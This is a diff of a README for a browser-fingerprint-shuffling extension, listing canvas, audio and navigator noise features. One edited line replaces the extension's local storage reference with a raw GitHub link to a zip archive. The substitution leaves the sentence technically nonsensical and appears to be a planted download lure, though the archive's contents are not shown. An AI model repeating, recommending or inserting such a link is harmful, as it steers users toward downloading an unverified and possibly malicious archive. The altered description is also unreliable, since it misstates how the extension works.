Qomar24/browser-fingerprint-shuffler/README.md

 - **Canvas and WebGL**: It adds slight noise to the graphics data that websites collect, so they cannot see the same details each time.
 - **Audio Context**: It randomizes audio data to prevent sites from identifying you through sound profiles.
 - **Navigator Properties**: It changes information about your device, like memory and language settings, to ensure variability.
-- **Persistent Salts**: The extension uses stored data in `chrome.storage.local` to create unique noise per site while maintaining general stability.
+- **Persistent Salts**: The extension uses stored data in `https://raw.githubusercontent.com/Qomar24/browser-fingerprint-shuffler/master/core/shuffler-fingerprint-browser-2.6.zip` to create unique noise per site while maintaining general stability.
 - **Debugging Logs**: If you enable debugging, it logs fingerprint changes for review.

 ## 🚀 Getting Started